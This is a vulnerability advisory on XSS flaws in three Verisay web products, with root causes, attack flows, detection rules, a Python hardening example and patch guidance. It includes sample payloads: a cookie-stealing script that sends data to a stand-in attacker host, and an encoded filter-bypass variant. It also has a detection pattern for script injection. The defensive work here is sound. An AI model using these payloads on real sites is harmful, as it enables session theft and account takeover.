Vendor: Verisay Communication and Information Technology Industry and Trade Ltd. Co.
Affected Products: Trizbi, Titarus, Aidango
Affected Versions: All releases before 2.144.4
Vulnerability Class: Improper Neutralization of Input During Web Page Generation (XSS)
Attack Vector: Remote (HTTP/HTTPS)
User Interaction Required: Yes (viewing a crafted page or object)
Exploit Complexity: Low
Exploit Availability: Public, no exploit kit required
Fix Availability: Yes (official vendor patch)
Consolidated Risk Overview
These vulnerabilities allow attackers to inject malicious JavaScript code into trusted web pages.
Once triggered, the attacker’s code executes inside the victim’s browser, inheriting the same trust level as the application itself.
This effectively breaks the browser’s same-origin trust model and enables session theft, account takeover, and data exfiltration.
CVE-2025-2406 — XSS Vulnerability in Trizbi
Summary
- CVE ID: CVE-2025-2406
- Severity: High
- CVSS v3.1 Score: 7.4
- Vulnerability Type: Stored and Reflected XSS
- Exploitability: Remote
- Exploit Maturity: Weaponizable with basic web skills
Root Cause
Trizbi does not consistently sanitize or encode user-controlled input before rendering it into HTML responses.
Fields that accept free-form text are reflected or stored without enforcing output encoding.
Exploitation Flow
- Attacker submits a malicious script into an input field or request parameter
- The application stores or reflects the input verbatim
- A victim loads the affected page
- The browser executes attacker-controlled JavaScript
Expanded Impact
- Theft of active session cookies
- Silent account takeover
- Execution of unauthorized actions on behalf of the victim
- Injection of fake UI elements to harvest credentials
CVE-2025-2405 — XSS Vulnerability in Titarus
Summary
- CVE ID: CVE-2025-2405
- Severity: High
- CVSS v3.1 Score: 7.4
- Vulnerability Type: Reflected XSS
- Exploitability: Remote
Root Cause
User-supplied data in HTTP parameters is embedded directly into the response page without proper HTML escaping.
The absence of server-side validation allows malicious payloads to execute immediately when a crafted URL is visited.
Exploitation Flow
- Attacker crafts a malicious URL containing JavaScript payload
- Victim is lured via email, chat, or embedded link
- Payload executes as soon as the page loads
Expanded Impact
- Credential harvesting through fake login overlays
- Forced redirection to attacker-controlled sites
- Browser-based malware delivery
- Abuse of trusted domain reputation
CVE-2025-2307 — XSS Vulnerability in Aidango
Summary
- CVE ID: CVE-2025-2307
- Severity: High
- CVSS v3.1 Score: 7.4
- Vulnerability Type: Stored XSS
- Exploitability: Remote
Root Cause
Aidango processes user input without enforcing proper encoding at output time.
Malicious scripts stored in backend data sources are later rendered directly in user-facing pages.
Exploitation Flow
- Attacker injects script into a stored field
- Application saves payload without sanitization
- Any user accessing the affected record executes the script
Expanded Impact
- Large-scale compromise of multiple user accounts
- Persistent attacker presence until payload removal
- Abuse of administrative sessions if viewed by privileged users
Example XSS Payloads
Basic proof-of-concept:
<script>alert(document.domain)</script>
Session exfiltration:
<script>fetch('https://attacker.site/?c='+document.cookie)</script>
Encoded variant (bypasses naive filters):
%3Cscript%3Ealert(1)%3C/script%3E
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Credential Access | Web Session Cookie Theft | T1550 |
| Collection | Input Capture | T1056 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Impact | Account Takeover | T1531 |
Detection & Monitoring Strategy
What to Watch For
- <script> tags in HTTP parameters or POST bodies
- JavaScript event handlers (onerror, onload, onclick)
- Encoded payloads (%3C, %3E, %22)
- Sudden spike in session invalidations
Recommended Log Sources
- Web server access logs
- Application request/response logs
- Web Application Firewall (WAF) logs
- SIEM correlation alerts
Sample Detection Rule (WAF / IDS)
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (
    msg:"Possible XSS Attempt - Verisay Application";
    flow:to_server,established;
    pcre:"/(<script>|%3Cscript|\bonerror\b|\bonload\b|\beval\b)/i";
    classtype:web-application-attack;
    sid:20252406; rev:1;
)
Proof-of-Concept Status
- No custom exploit code required
- Easily reproducible using:
- Browser developer tools
- Burp Suite
- Manual crafted HTTP requests
Attack success depends only on user interaction, not authentication bypass.
Remediation & Hardening
Official Patch (Required)
Upgrade all affected products to version 2.144.4 or later using the official Verisay patch channel only.
Additional Security Controls
- Enforce strict server-side input validation
- Apply context-aware output encoding
- Implement Content Security Policy (CSP)
- Set cookies with HttpOnly and Secure flags
- Conduct regular application security testing
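The root-cause sections all describe the same defect, user input concatenated into HTML without output encoding, and the controls above are the standard fix. The Python below is an added illustration for this advisory, not code from any Verisay product (their implementation language is not stated): a hypothetical template fragment is rendered once the vulnerable way and once with context-aware encoding for the HTML text, attribute and URL contexts, alongside the response headers that carry the CSP and the HttpOnly/Secure cookie flags. The example generalizes the page's HTML-body case to attribute and URL contexts, since the encoding that is safe differs per context.

```python
import html
from urllib.parse import quote, unquote


# Vulnerable pattern, as described in the root-cause sections: user-controlled
# values are interpolated straight into the HTML response.
def render_vulnerable(name, comment):
    return f'<div class="user" data-name="{name}"><p>{comment}</p></div>'


# Hardened pattern: one encoder per output context, applied at render time.
def encode_html_text(value):
    """HTML body text: neutralize & < > " ' so the value can never open a tag."""
    return html.escape(value, quote=True)


def encode_html_attr(value):
    """Quoted attribute value: the same escaping; the template must always quote the attribute."""
    return html.escape(value, quote=True)


def encode_url_param(value):
    """URL query component: percent-encode everything except unreserved characters."""
    return quote(value, safe="")


def render_hardened(name, comment):
    return (
        f'<div class="user" data-name="{encode_html_attr(name)}">'
        f"<p>{encode_html_text(comment)}</p>"
        f'<a href="/profile?name={encode_url_param(name)}">profile</a></div>'
    )


def render_search_result(raw_q):
    """Reflected-parameter path: decode the query value, then encode it for the HTML body.

    Decoding first means the encoded variant from the advisory is escaped, not passed through.
    """
    return f"<p>Results for {encode_html_text(unquote(raw_q))}</p>"


def security_headers(session_id):
    """Response headers implementing the CSP and cookie-flag controls listed above."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"
        ),
        "Set-Cookie": f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax",
        "X-Content-Type-Options": "nosniff",
    }


def contains_script_tag(page):
    """Test helper: does the rendered page still contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    payload = "<script>alert(document.domain)</script>"
    print("vulnerable:", render_vulnerable("bob", payload))
    print("hardened:  ", render_hardened("bob", payload))
    print("headers:   ", security_headers("example-session-id"))
```

Input validation (the first control) still belongs at the trust boundary, but it is the output encoding here that removes the vulnerability class: a value that is valid for one field can still be dangerous in a context the validator never considered, which is why the encoder is chosen per context rather than per field.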
Final Takeaway
These XSS vulnerabilities are:
- Easy to exploit
- Low-cost for attackers
- High-impact for users and organizations
Left unpatched, they can directly lead to account compromise, data leakage, and abuse of trust across the application ecosystem.
